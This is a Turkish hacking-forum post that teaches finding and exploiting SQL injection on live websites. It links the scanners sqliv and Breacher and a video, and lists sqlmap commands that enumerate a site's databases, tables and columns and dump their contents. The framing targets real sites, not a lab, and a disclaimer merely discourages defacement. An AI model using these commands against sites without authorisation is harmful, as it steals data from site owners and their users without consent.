Canlı Web Sitesi Açık Arama Ve İstismar Etme

fr3ddyb3aR

fr3ddyb3aR

Yeni üye
20 May 2019
8
2
Herkese Merhaba.

Bu konuda açık aramayı ve istismar etmeyi gösterdim sql injection ile. Başka zafiyet istismarı ya da başka birşey özellikle
öğrenmek isterseniz yorumlara yazın konuyla ilgili konu başlatırım. İlk videolu dersimdi biraz gergindim kusura bakmazsınız umarım.
Web sitesine zarar vermek gibi bir amacım yoktu eğer siz özel olarak buraya index gibi zarar vermeyin eğer verirseniz benim sorumluluğumda değil. Zarar vermeniz önerilmez. Konuya geçelim o zaman.

sqliv https://github.com/the-robot/sqliv.git

breacher https://github.com/s0md3v/Breacher.git

video:

https://youtu.be/xEvMR0XlTP0

Komutlar: (dedğim gibi ilk videolu dersimdi biraz sıkıntı oldu diğer videolarla olmaz. Videoda gözükmemiş bunlar.)

sqlmap -u <url> --dbs (database görüntüler)

sqlmap -u <url> -D <database ismi> --tables (databasedeki tablelerı görüntüler)

sqlmap -u <url> -D <database ismi> -T <table ismi> --columns (tabledeki kolumları görüntüler)

sqlmap -u <url> -D <database ismi> -T <table ismi> -C <column ismi yada isimleri> --dump (kolumdaki bilgileri dump eder)
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.